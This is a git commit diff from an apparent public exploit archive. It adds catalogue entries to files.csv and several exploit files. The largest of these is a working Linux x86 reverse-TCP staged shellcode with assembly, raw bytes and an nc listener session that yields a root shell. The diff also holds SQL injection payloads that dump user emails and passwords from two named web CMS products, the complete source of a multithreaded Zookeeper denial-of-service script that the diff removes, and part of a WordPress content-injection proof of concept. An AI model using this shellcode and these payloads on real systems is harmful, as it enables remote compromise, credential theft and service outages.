DB: 2017-02-09
3 new exploits Zookeeper 3.5.2 - Denial of Service Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes) YapBB 1.2 - (forumID) Blind SQL Injection YapBB 1.2 - 'forumID' Parameter Blind SQL Injection ClearBudget 0.6.1 - (Misspelled htaccess) Insecure DD ClearBudget 0.6.1 - Insecure Database Download phpYabs 0.1.2 - (Azione) Remote File Inclusion phpYabs 0.1.2 - 'Azione' Parameter Remote File Inclusion IF-CMS 2.0 - 'frame.php id' Blind SQL Injection IF-CMS 2.0 - 'id' Parameter Blind SQL Injection BusinessSpace 1.2 - 'id' SQL Injection A Better Member-Based ASP Photo Gallery - 'entry' SQL Injection BusinessSpace 1.2 - 'id' Parameter SQL Injection A Better Member-Based ASP Photo Gallery - 'entry' Parameter SQL Injection FlexCMS - (catId) SQL Injection FlexCMS 2.5 - 'catId' Parameter SQL Injection Thyme 1.3 - (export_to) Local File Inclusion Papoo CMS 3.x - (pfadhier) Local File Inclusion q-news 2.0 - Remote Command Execution Potato News 1.0.0 - (user) Local File Inclusion Thyme 1.3 - 'export_to' Parameter Local File Inclusion Papoo CMS 3.x - 'pfadhier' Parameter Local File Inclusion Q-News 2.0 - Remote Command Execution Potato News 1.0.0 - Local File Inclusion Mynews 0_10 - Authentication Bypass Mynews 0.10 - Authentication Bypass Muviko Video CMS - SQL Injection Multi Outlets POS 3.1 - 'id' Parameter SQL Injection
This commit is contained in:
parent
2ff74c7c1b
commit
d1a0e8f9fd
6 changed files with 257 additions and 115 deletions
28
files.csv
28
files.csv
|
@ -5359,7 +5359,6 @@ id,file,description,date,author,platform,type,port
|
|||
41219,platforms/hardware/dos/41219.txt,"QNAP NVR/NAS - Buffer Overflow",2017-02-01,bashis,hardware,dos,0
|
||||
41222,platforms/windows/dos/41222.py,"Microsoft Windows 10 - SMBv3 Tree Connect (PoC)",2017-02-01,"laurent gaffie",windows,dos,0
|
||||
41232,platforms/android/dos/41232.txt,"Google Android - 'rkp_set_init_page_ro' RKP Memory Corruption",2017-02-02,"Google Security Research",android,dos,0
|
||||
41277,platforms/linux/dos/41277.py,"Zookeeper 3.5.2 - Denial of Service",2017-02-07,"Brandon Dennis",linux,dos,0
|
||||
41278,platforms/openbsd/dos/41278.txt,"OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service",2017-02-07,PierreKimSec,openbsd,dos,80
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
|
@ -15876,6 +15875,7 @@ id,file,description,date,author,platform,type,port
|
|||
41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86_64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0
|
||||
41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0
|
||||
41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
|
||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||
|
@ -20682,12 +20682,12 @@ id,file,description,date,author,platform,type,port
|
|||
7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 - 'bbcode.php l' Local File Inclusion",2009-02-04,Osirys,php,webapps,0
|
||||
7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management 3.0 - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0
|
||||
7982,platforms/asp/webapps/7982.txt,"team 1.x - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0
|
||||
7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - (forumID) Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0
|
||||
7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - 'forumID' Parameter Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0
|
||||
7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 - Arbitrary File Upload / Authentication Bypass",2009-02-04,JosS,php,webapps,0
|
||||
7991,platforms/asp/webapps/7991.txt,"GR Note 0.94 Beta - (Authentication Bypass) Remote Database Backup",2009-02-04,JosS,asp,webapps,0
|
||||
7992,platforms/php/webapps/7992.txt,"ClearBudget 0.6.1 - Insecure Cookie Handling / Local File Inclusion",2009-02-05,SirGod,php,webapps,0
|
||||
7993,platforms/php/webapps/7993.txt,"Kipper 2.01 - Cross-Site Scripting / Local File Inclusion / File Disclosure",2009-02-05,RoMaNcYxHaCkEr,php,webapps,0
|
||||
7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - (Misspelled htaccess) Insecure DD",2009-02-05,Room-Hacker,php,webapps,0
|
||||
7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - Insecure Database Download",2009-02-05,Room-Hacker,php,webapps,0
|
||||
7997,platforms/php/webapps/7997.htm,"txtBB 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit",2009-02-05,cOndemned,php,webapps,0
|
||||
7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote Arbitrary.PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0
|
||||
7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution",2009-02-06,Osirys,php,webapps,0
|
||||
|
@ -20696,29 +20696,29 @@ id,file,description,date,author,platform,type,port
|
|||
8002,platforms/php/webapps/8002.txt,"CafeEngine - 'catid' Parameter SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0
|
||||
8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with Remote File Inclusion (c99)",2009-02-06,JosS,php,webapps,0
|
||||
8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution",2009-02-06,x0r,php,webapps,0
|
||||
8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - (Azione) Remote File Inclusion",2009-02-06,Arka69,php,webapps,0
|
||||
8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - 'Azione' Parameter Remote File Inclusion",2009-02-06,Arka69,php,webapps,0
|
||||
8006,platforms/php/webapps/8006.txt,"Traidnt UP 1.0 - Arbitrary File Upload",2009-02-09,fantastic,php,webapps,0
|
||||
8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - 'frame.php id' Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0
|
||||
8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - 'id' Parameter Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0
|
||||
8009,platforms/php/webapps/8009.pl,"w3bcms 3.5.0 - Multiple Vulnerabilities",2009-02-09,DNX,php,webapps,0
|
||||
8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' SQL Injection",2009-02-09,K-159,php,webapps,0
|
||||
8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - 'entry' SQL Injection",2009-02-09,BackDoor,php,webapps,0
|
||||
8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' Parameter SQL Injection",2009-02-09,K-159,php,webapps,0
|
||||
8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - 'entry' Parameter SQL Injection",2009-02-09,BackDoor,php,webapps,0
|
||||
8014,platforms/php/webapps/8014.pl,"PHP Director 0.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0
|
||||
8015,platforms/php/webapps/8015.pl,"Hedgehog-CMS 1.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0
|
||||
8016,platforms/php/webapps/8016.txt,"AdaptCMS Lite 1.4 - Cross-Site Scripting / Remote File Inclusion",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0
|
||||
8017,platforms/php/webapps/8017.txt,"SnippetMaster Webpage Editor 2.2.2 - Remote File Inclusion / Cross-Site Scripting",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0
|
||||
8018,platforms/php/webapps/8018.txt,"FlexCMS - (catId) SQL Injection",2009-02-09,MisterRichard,php,webapps,0
|
||||
8018,platforms/php/webapps/8018.txt,"FlexCMS 2.5 - 'catId' Parameter SQL Injection",2009-02-09,MisterRichard,php,webapps,0
|
||||
8019,platforms/php/webapps/8019.txt,"ZeroBoardXE 1.1.5 (09.01.22) - Cross-Site Scripting",2009-02-09,make0day,php,webapps,0
|
||||
8020,platforms/php/webapps/8020.txt,"Yet Another NOCC 0.1.0 - Local File Inclusion",2009-02-09,Kacper,php,webapps,0
|
||||
8025,platforms/php/webapps/8025.txt,"webframe 0.76 - Multiple File Inclusion",2009-02-09,ahmadbady,php,webapps,0
|
||||
8026,platforms/php/webapps/8026.txt,"WB News 2.1.1 - config[installdir] Remote File Inclusion",2009-02-09,ahmadbady,php,webapps,0
|
||||
8027,platforms/php/webapps/8027.txt,"Gaeste 1.6 - 'gastbuch.php' Remote File Disclosure",2009-02-09,bd0rk,php,webapps,0
|
||||
8028,platforms/php/webapps/8028.pl,"Hedgehog-CMS 1.21 - Local File Inclusion / Remote Command Execution",2009-02-09,Osirys,php,webapps,0
|
||||
8029,platforms/php/webapps/8029.txt,"Thyme 1.3 - (export_to) Local File Inclusion",2009-02-10,cheverok,php,webapps,0
|
||||
8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - (pfadhier) Local File Inclusion",2009-02-10,SirGod,php,webapps,0
|
||||
8031,platforms/php/webapps/8031.pph,"q-news 2.0 - Remote Command Execution",2009-02-10,Fireshot,php,webapps,0
|
||||
8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 - (user) Local File Inclusion",2009-02-10,x0r,php,webapps,0
|
||||
8029,platforms/php/webapps/8029.txt,"Thyme 1.3 - 'export_to' Parameter Local File Inclusion",2009-02-10,cheverok,php,webapps,0
|
||||
8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - 'pfadhier' Parameter Local File Inclusion",2009-02-10,SirGod,php,webapps,0
|
||||
8031,platforms/php/webapps/8031.pph,"Q-News 2.0 - Remote Command Execution",2009-02-10,Fireshot,php,webapps,0
|
||||
8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 - Local File Inclusion",2009-02-10,x0r,php,webapps,0
|
||||
8033,platforms/php/webapps/8033.txt,"AuthPhp 1.0 - Authentication Bypass",2009-02-10,x0r,php,webapps,0
|
||||
8034,platforms/php/webapps/8034.txt,"Mynews 0_10 - Authentication Bypass",2009-02-10,x0r,php,webapps,0
|
||||
8034,platforms/php/webapps/8034.txt,"Mynews 0.10 - Authentication Bypass",2009-02-10,x0r,php,webapps,0
|
||||
8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release - Authentication Bypass",2009-02-10,x0r,php,webapps,0
|
||||
8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 - File Disclosure / SQL Injection / Command Execution",2009-02-10,Osirys,php,webapps,0
|
||||
8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 - (jumpUrl) Remote File Disclosure",2009-02-10,Lolek,php,webapps,0
|
||||
|
@ -37201,3 +37201,5 @@ id,file,description,date,author,platform,type,port
|
|||
41270,platforms/php/webapps/41270.txt,"FTP Made Easy PRO 1.2 - Arbitrary File Download",2017-02-07,"Ihsan Sencan",php,webapps,0
|
||||
41271,platforms/php/webapps/41271.txt,"Easy File Uploader 1.2 - Arbitrary File Download",2017-02-07,"Ihsan Sencan",php,webapps,0
|
||||
41272,platforms/php/webapps/41272.txt,"Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure",2017-02-07,"Wiswat Aswamenakul",php,webapps,0
|
||||
41279,platforms/php/webapps/41279.txt,"Muviko Video CMS - SQL Injection",2017-02-08,"Ihsan Sencan",php,webapps,0
|
||||
41280,platforms/php/webapps/41280.txt,"Multi Outlets POS 3.1 - 'id' Parameter SQL Injection",2017-02-08,"Ihsan Sencan",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
198
platforms/lin_x86/shellcode/41282.nasm
Executable file
198
platforms/lin_x86/shellcode/41282.nasm
Executable file
|
@ -0,0 +1,198 @@
|
|||
########### Reverse TCP Staged Alphanumeric Shellcode Linux x86 Execve /bin/sh ########
|
||||
########### Author: Snir Levi, Applitects #############
|
||||
## 103 Bytes ##
|
||||
|
||||
date: 9.2.17
|
||||
Automatic python shellcode handler (with stage preset send) will be ready soon:
|
||||
https://github.com/snir-levi/Reverse_TCP_Alphanumeric_Staged_Shellcode_Execve-bin-bash/
|
||||
|
||||
|
||||
IP - 127.0.0.1
|
||||
PORT - 4444
|
||||
|
||||
#### Stage Alphanumeric shellcode: #####
|
||||
Stage 1:
|
||||
dup2 stdin syscall:
|
||||
|
||||
WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
|
||||
|
||||
W push edi
|
||||
X pop eax
|
||||
W push edi
|
||||
[ pop ebx
|
||||
j? push 0x3f
|
||||
X pop eax
|
||||
V push esi
|
||||
[ pop ebx
|
||||
W push edi
|
||||
Y pop ecx
|
||||
P push eax
|
||||
X pop eax
|
||||
P push eax
|
||||
X pop EAX
|
||||
|
||||
Stage 2:
|
||||
dup2 stdout syscall:
|
||||
|
||||
WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX
|
||||
|
||||
W push edi
|
||||
X pop eax
|
||||
W push edi
|
||||
[ pop ebx
|
||||
j? push 0x3f
|
||||
X pop eax
|
||||
V push esi
|
||||
[ pop ebx
|
||||
W push edi
|
||||
Y pop ecx
|
||||
A inc ecx (ecx =1)
|
||||
P push eax
|
||||
X pop eax
|
||||
P push eax
|
||||
|
||||
Stage 3:
|
||||
dup2 stderr syscall:
|
||||
|
||||
WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
|
||||
|
||||
W push edi
|
||||
X pop eax
|
||||
W push edi
|
||||
[ pop ebx
|
||||
j? push 0x3f
|
||||
X pop eax
|
||||
V push esi
|
||||
[ pop ebx
|
||||
W push edi
|
||||
Y pop ecx
|
||||
A*2 inc ecx (ecx = 2)
|
||||
P push eax
|
||||
X pop eax
|
||||
A inc ecx
|
||||
|
||||
Stage 3:
|
||||
execve /bin/sh:
|
||||
|
||||
j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[
|
||||
|
||||
j0 push 0x30
|
||||
X pop eax
|
||||
H*32 dec eax //eax = 0x0b
|
||||
W push edi
|
||||
Y pop ecx
|
||||
W push edi
|
||||
Z pop edx
|
||||
W push edi // null terminator
|
||||
h//sh push 0x68732f2f //sh
|
||||
h/bin push 0x6e69622f /bin
|
||||
T push esp
|
||||
[ pop ebx
|
||||
|
||||
Usage: Victim Executes the shellcode, and opens tcp connection
|
||||
|
||||
Stage:
|
||||
After Connection is established, send the 4 stages ***separately***
|
||||
|
||||
nc -lvp 4444
|
||||
connect to [127.0.0.1] from localhost [127.0.0.1] (port)
|
||||
WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
|
||||
WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX
|
||||
WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
|
||||
j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[
|
||||
|
||||
whoami
|
||||
root
|
||||
id
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
|
||||
|
||||
global _start
|
||||
|
||||
|
||||
_start:
|
||||
|
||||
; sock = socket(AF_INET, SOCK_STREAM, 0)
|
||||
; AF_INET = 2
|
||||
; SOCK_STREAM = 1
|
||||
; syscall number 102 - socketcall
|
||||
; socket = 0x01
|
||||
|
||||
xor eax,eax
|
||||
xor esi,esi
|
||||
push eax
|
||||
pop edi
|
||||
push eax
|
||||
mov al, 0x66
|
||||
push byte 0x1
|
||||
pop ebx
|
||||
push byte ebx
|
||||
push byte 0x2
|
||||
mov ecx, esp
|
||||
int 0x80
|
||||
|
||||
xchg esi, eax; save sock result
|
||||
|
||||
; server.sin_family = AF_INET
|
||||
; server.sin_port = htons(PORT)
|
||||
; server.sin_addr.s_addr = inet_addr("127.0.0.1")
|
||||
|
||||
push byte 0x1
|
||||
pop edx
|
||||
shl edx, 24
|
||||
mov dl, 0x7f ;edx = 127.0.0.1 (hex)
|
||||
push edx
|
||||
push word 0x5c11 ;port 4444
|
||||
push word 0x02
|
||||
|
||||
; connect(sock, (struct sockaddr *)&server, sockaddr_len)
|
||||
|
||||
mov al, 0x66
|
||||
mov bl, 0x3
|
||||
mov ecx, esp
|
||||
push byte 0x10
|
||||
push ecx
|
||||
push esi
|
||||
mov ecx ,esp
|
||||
int 0x80
|
||||
|
||||
|
||||
stageAddress: ;saves stage address to edx
|
||||
mov edx, [esp]
|
||||
sub bl,3
|
||||
jnz stage
|
||||
|
||||
call near stageAddress
|
||||
|
||||
;recv(int sockfd, void *buf, size_t len, int flags);
|
||||
|
||||
stage:
|
||||
mov al, 0x66
|
||||
mov bl, 10
|
||||
push edi
|
||||
push word 100 ; buffer size
|
||||
push edi
|
||||
push esi ; socketfd
|
||||
mov [esp+4],esp ; sets esp as recv buffer
|
||||
mov ecx,esp
|
||||
int 0x80
|
||||
mov al, 0xcd
|
||||
mov ah, 0x80 ; eax = int 0x80
|
||||
mov bl, 0xFF
|
||||
mov bh, 0xE2 ; ebx = jmp edx
|
||||
mov [esp+57],al
|
||||
mov [esp+58],ah
|
||||
mov [esp+59], ebx ;the end of the buffer contains the syscall command int 0x80 and jmp back to stage
|
||||
jmp esp
|
||||
|
||||
|
||||
|
||||
unsigned char[] = "\x31\xc0\x31\xf6\x50\x5f\x50\xb0\x66\x6a\x01\x5b\x53\x6a
|
||||
\x02\x89\xe1\xcd\x80\x96\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52
|
||||
\x66\x68\x11\x5c\x66\x6a\x02\xb0\x66\xb3\x03\x89\xe1\x6a\x10\x51\x56\x89\xe1
|
||||
\xcd\x80\x8b\x14\x24\x80\xeb\x03\x75\x05\xe8\xf3\xff\xff\xff
|
||||
\xb0\x66\xb3\x0a\x57\x66\x6a\x64\x57\x56\x89\x64\x24\x04\x89\xe1\xcd\x80\xb0
|
||||
\xcd\xb4\x80\xb3\xff\xb7\xe2\x88\x44\x24\x39\x88\x64\x24\x3a
|
||||
\x89\x5c\x24\x3b\xff\xe4"
|
||||
|
||||
|
|
@ -1,86 +0,0 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
# Exploit Title: Zookeeper Client Denial Of Service (Port 2181)
|
||||
# Date: 2/7/2017
|
||||
# Exploit Author: Brandon Dennis
|
||||
# Email: bdennis@mail.hodges.edu
|
||||
# Software Link: http://zookeeper.apache.org/releases.html#download
|
||||
# Zookeeper Version: 3.5.2
|
||||
# Tested on: Windows 2008 R2, Windows 2012 R2 x64 & x86
|
||||
# Description: The wchp command to the ZK port 2181 will gather open internal files by each session/watcher and organize them for the requesting client.
|
||||
# This command is CPU intensive and will cause a denial of service to the port as well as spike the CPU of the remote machine to 90-100% consistently before any other traffic.
|
||||
# The average amount of threads uses was 10000 for testing. This should work on all 3.x+ versions of Zookeeper.
|
||||
# This should effect Linux x86 & x64 as well
|
||||
|
||||
|
||||
|
||||
import time
|
||||
import os
|
||||
import threading
|
||||
import sys
|
||||
import socket
|
||||
|
||||
numOfThreads = 1
|
||||
exitStr = "n"
|
||||
stop_threads = False
|
||||
threads = []
|
||||
ipAddress = "192.168.1.5" #Change this
|
||||
port = 2181
|
||||
|
||||
def sendCommand(ipAddress, port):
|
||||
try:
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((ipAddress, port))
|
||||
s.send("wchp\r".encode("utf-8"))
|
||||
s.recv(1024)
|
||||
s.send("wchc\r".encode("utf-8"))
|
||||
s.close()
|
||||
except:
|
||||
pass
|
||||
|
||||
|
||||
def runCMD(id, stop, ipAddress, port):
|
||||
while True:
|
||||
sendCommand(ipAddress, port)
|
||||
if stop():
|
||||
break
|
||||
return
|
||||
|
||||
def welcomeBanner():
|
||||
banner = """ _______ __ _____ _
|
||||
|___ | | / / / __ \ | |
|
||||
/ /| |/ / | / \/_ __ __ _ ___| |__ ___ _ __
|
||||
/ / | \ | | | '__/ _` / __| '_ \ / _ | '__|
|
||||
./ /__| |\ \ | \__/| | | (_| \__ | | | | __| |
|
||||
\_____\_| \_/ \____|_| \__,_|___|_| |_|\___|_|
|
||||
|
||||
By: Brandon Dennis
|
||||
Email: bdennis@mail.hodges.edu
|
||||
"""
|
||||
print(banner)
|
||||
|
||||
|
||||
welcomeBanner()
|
||||
numOfThreads = int(input("How many threads do you want to use: "))
|
||||
print ("Startin Up Threads...")
|
||||
for i in range(numOfThreads):
|
||||
t = threading.Thread(target=runCMD, args=(id, lambda: stop_threads, ipAddress, port))
|
||||
threads.append(t)
|
||||
t.start()
|
||||
print("Threads are now started...")
|
||||
|
||||
|
||||
while exitStr != "y":
|
||||
inpt = input("Do you wish to stop threads(y): ")
|
||||
|
||||
if inpt == "y":
|
||||
exitStr = "y"
|
||||
|
||||
print("\nStopping Threads...")
|
||||
stop_threads = True
|
||||
for thread in threads:
|
||||
thread.join()
|
||||
|
||||
print("Threads are now stopped...")
|
||||
sys.exit(0);
|
||||
|
|
@ -1,14 +1,3 @@
|
|||
# Exploit Title: Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
|
||||
# Date: 2017-02-02
|
||||
# Exploit Author: @leonjza
|
||||
# Vendor Homepage: https://wordpress.org/
|
||||
# Software Link: https://wordpress.org/wordpress-4.7.zip
|
||||
# Version: Wordpress 4.7.0/4.7.1
|
||||
# Tested on: Debian Jessie
|
||||
#
|
||||
# PoC gist: https://gist.github.com/leonjza/2244eb15510a0687ed93160c623762ab
|
||||
#
|
||||
|
||||
# 2017 - @leonjza
|
||||
#
|
||||
# Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
|
||||
|
@ -61,7 +50,7 @@ def get_posts(api_base):
|
|||
posts = json.loads(respone.read())
|
||||
|
||||
for post in posts:
|
||||
print(' - Post ID: {}, Title: {}, Url: {}'
|
||||
print(' - Post ID: {0}, Title: {1}, Url: {2}'
|
||||
.format(post['id'], post['title']['rendered'], post['link']))
|
||||
|
||||
|
||||
|
@ -76,11 +65,11 @@ def update_post(api_base, post_id, post_content):
|
|||
req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
|
||||
response = urllib2.urlopen(req).read()
|
||||
|
||||
print('* Post updated. Check it out at {}'.format(json.loads(response)['link']))
|
||||
print('* Post updated. Check it out at {0}'.format(json.loads(response)['link']))
|
||||
|
||||
|
||||
def print_usage():
|
||||
print('Usage: {} <url> (optional: <post_id> <file with post_content>)'.format(__file__))
|
||||
print('Usage: {0} <url> (optional: <post_id> <file with post_content>)'.format(__file__))
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
@ -98,7 +87,7 @@ if __name__ == '__main__':
|
|||
|
||||
print('* Discovering API Endpoint')
|
||||
api_url = get_api_url(sys.argv[1])
|
||||
print('* API lives at: {}'.format(api_url))
|
||||
print('* API lives at: {0}'.format(api_url))
|
||||
|
||||
# if we only have a url, show the posts we have have
|
||||
if len(sys.argv) < 3:
|
||||
|
@ -108,7 +97,7 @@ if __name__ == '__main__':
|
|||
sys.exit(0)
|
||||
|
||||
# if we get here, we have what we need to update a post!
|
||||
print('* Updating post {}'.format(sys.argv[2]))
|
||||
print('* Updating post {0}'.format(sys.argv[2]))
|
||||
with open(sys.argv[3], 'r') as content:
|
||||
new_content = content.readlines()
|
||||
|
||||
|
|
21
platforms/php/webapps/41279.txt
Executable file
21
platforms/php/webapps/41279.txt
Executable file
|
@ -0,0 +1,21 @@
|
|||
# # # # #
|
||||
# Exploit Title: Muviko Video CMS Script - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 08.02.2017
|
||||
# Vendor Homepage: https://muvikoscript.com/
|
||||
# Software Buy: https://codecanyon.net/item/muviko-movie-video-cms/19402086
|
||||
# Demo: https://demo.muvikoscript.com/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/search.php?q=[SQL]
|
||||
# -9999'+/*!50000union*/+select+1,concat_ws(0x3c62723e,email,0x3c62723e,password,0x3c62723e,name),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users-- -
|
||||
# http://localhost/[PATH]/category.php?id=[SQL]
|
||||
# -9999'+/*!50000union*/+select+1,concat_ws(0x3c62723e,email,0x3c62723e,password,0x3c62723e,name),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users-- -
|
||||
# Etc...
|
||||
# # # # #
|
18
platforms/php/webapps/41280.txt
Executable file
18
platforms/php/webapps/41280.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Point of Sales - Multi Outlets POS v3.1 Script - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 08.02.2017
|
||||
# Vendor Homepage: http://prosoft-apps.com/
|
||||
# Software Buy: https://codecanyon.net/item/point-of-sales-multi-outlets-pos/17674742
|
||||
# Demo: http://pos.prosoft-apps.com/pos/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/view_invoice?id=[SQL]
|
||||
# Etc...
|
||||
# # # # #
|
Loading…
Add table
Reference in a new issue